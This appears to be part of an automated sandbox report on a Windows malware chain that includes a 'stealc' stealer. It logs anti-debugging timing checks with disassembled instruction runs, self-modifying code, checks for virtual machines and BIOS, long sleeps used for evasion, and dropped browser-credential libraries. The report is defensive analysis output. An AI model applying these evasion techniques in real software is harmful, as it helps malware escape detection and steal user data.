                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380E8F second address: 5380E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380E93 second address: 5380EAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop ecx 0x00000011 mov ax, di 0x00000014 popad 0x00000015 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380EAF second address: 5380F2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0DD08F41C0h 0x00000008 pop eax 0x00000009 mov edx, 18714136h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F0DD08F41BCh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0DD08F41BEh 0x0000001f jmp 00007F0DD08F41C5h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F0DD08F41C0h 0x0000002b or si, B2B8h 0x00000030 jmp 00007F0DD08F41BBh 0x00000035 popfd 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e movsx edi, cx 0x00000041 popad 0x00000042 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380F2D second address: 5380F97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0DD1497E6Bh 0x00000013 or cx, 39DEh 0x00000018 jmp 00007F0DD1497E79h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F0DD1497E70h 0x00000024 sbb eax, 7B1E71D8h 0x0000002a jmp 00007F0DD1497E6Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 6DEDAF second address: 6DEDB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 6DEDB3 second address: 6DEDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Tries to evade debugger and weak emulator (self modifying code)
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSpecial instruction interceptor: First address: ADEE39 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSpecial instruction interceptor: First address: ADED0B instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSpecial instruction interceptor: First address: C803B8 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSpecial instruction interceptor: First address: C7ED21 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSpecial instruction interceptor: First address: C7E962 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSpecial instruction interceptor: First address: CA966C instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSpecial instruction interceptor: First address: C9279A instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSpecial instruction interceptor: First address: D10C1D instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 6DEE39 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 6DED0B instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 8803B8 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 87ED21 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 87E962 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 8A966C instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 89279A instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 910C1D instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSpecial instruction interceptor: First address: DAFB7E instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSpecial instruction interceptor: First address: F796AD instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSpecial instruction interceptor: First address: FDAB07 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSpecial instruction interceptor: First address: 69EB31 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSpecial instruction interceptor: First address: 84CE03 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSpecial instruction interceptor: First address: 8D9432 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: A0EB31 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: BBCE03 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeSpecial instruction interceptor: First address: 81CB7F instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeSpecial instruction interceptor: First address: 9C1F44 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeSpecial instruction interceptor: First address: 9D7E6B instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: C49432 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeSpecial instruction interceptor: First address: A57BA2 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeSpecial instruction interceptor: First address: 900C73 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeSpecial instruction interceptor: First address: B35C28 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_053E0CD1 rdtsc 0_2_053E0CD1
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 2369
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Math\_modexp.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_overlapped.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\select.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA224.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util\_cpuid_c.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_queue.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_sqlite3.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_socket.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_chacha20.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\pyexpat.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_pytransform.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_poly1305.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD4.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_ARC4.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\charset_normalizer\md.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD5.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_keccak.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_multiprocessing.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\charset_normalizer\md__mypyc.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_ctypes.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA1.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA512.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_ssl.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Protocol\_scrypt.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\_asyncio.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util\_strxor.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA256.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\python3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA384.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_des.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32282\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeAPI coverage: 4.3 %
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeAPI coverage: 2.0 %
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6380Thread sleep time: -52026s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2872Thread sleep count: 68 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2872Thread sleep time: -136068s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5316Thread sleep count: 132 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5316Thread sleep time: -3960000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3916Thread sleep count: 63 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3916Thread sleep time: -126063s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5812Thread sleep time: -48024s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6192Thread sleep count: 69 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6192Thread sleep time: -138069s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1892Thread sleep time: -180000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5316Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe TID: 6432Thread sleep time: -180000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe TID: 4904Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe TID: 3660Thread sleep time: -210000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe TID: 1516Thread sleep count: 31 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe TID: 1056Thread sleep time: -132000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe TID: 2568Thread sleep time: -330000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe TID: 2568Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeLast function: Thread delayed
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_004736A9 FindFirstFileExW,6_2_004736A9
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_0047375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_0047375A
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006993D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,8_2_006993D0
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeThread delayed: delay time: 30000
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeThread delayed: delay time: 30000
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: axplong.exe, axplong.exe, 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2716864309.000001FE20955000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
